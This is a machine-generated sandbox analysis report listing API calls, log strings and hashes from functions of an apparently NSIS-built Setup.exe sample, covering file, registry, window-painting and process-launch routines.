                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                              • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                              • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                              • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                              • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                              • API String ID: 565278875-3368763019
                                                                                                                                                                              • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                              • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                              • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                              • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                              APIs
                                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                              • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                              • String ID: F
                                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                                              • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                              • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                              • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                              • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                              • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                              Strings
                                                                                                                                                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                              • API String ID: 1641139501-220328614
                                                                                                                                                                              • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                              • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                              • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                              • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                              APIs
                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                              • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                              • API String ID: 3734993849-3206598305
                                                                                                                                                                              • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                              • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                              • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                              • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                              APIs
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                              Strings
                                                                                                                                                                              • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                              • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                              • API String ID: 3294113728-3145124454
                                                                                                                                                                              • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                              • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                              • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                              • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D76,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                              Strings
                                                                                                                                                                              • `G, xrefs: 0040246E
                                                                                                                                                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                              • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                              • API String ID: 1033533793-4193110038
                                                                                                                                                                              • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                              • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                              • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                              • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                              • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                              • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                              • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                              • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                              • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D76,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                              Strings
                                                                                                                                                                              • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                              • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                              • API String ID: 2014279497-3433828417
                                                                                                                                                                              • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                              • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                              • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                              • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                              • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
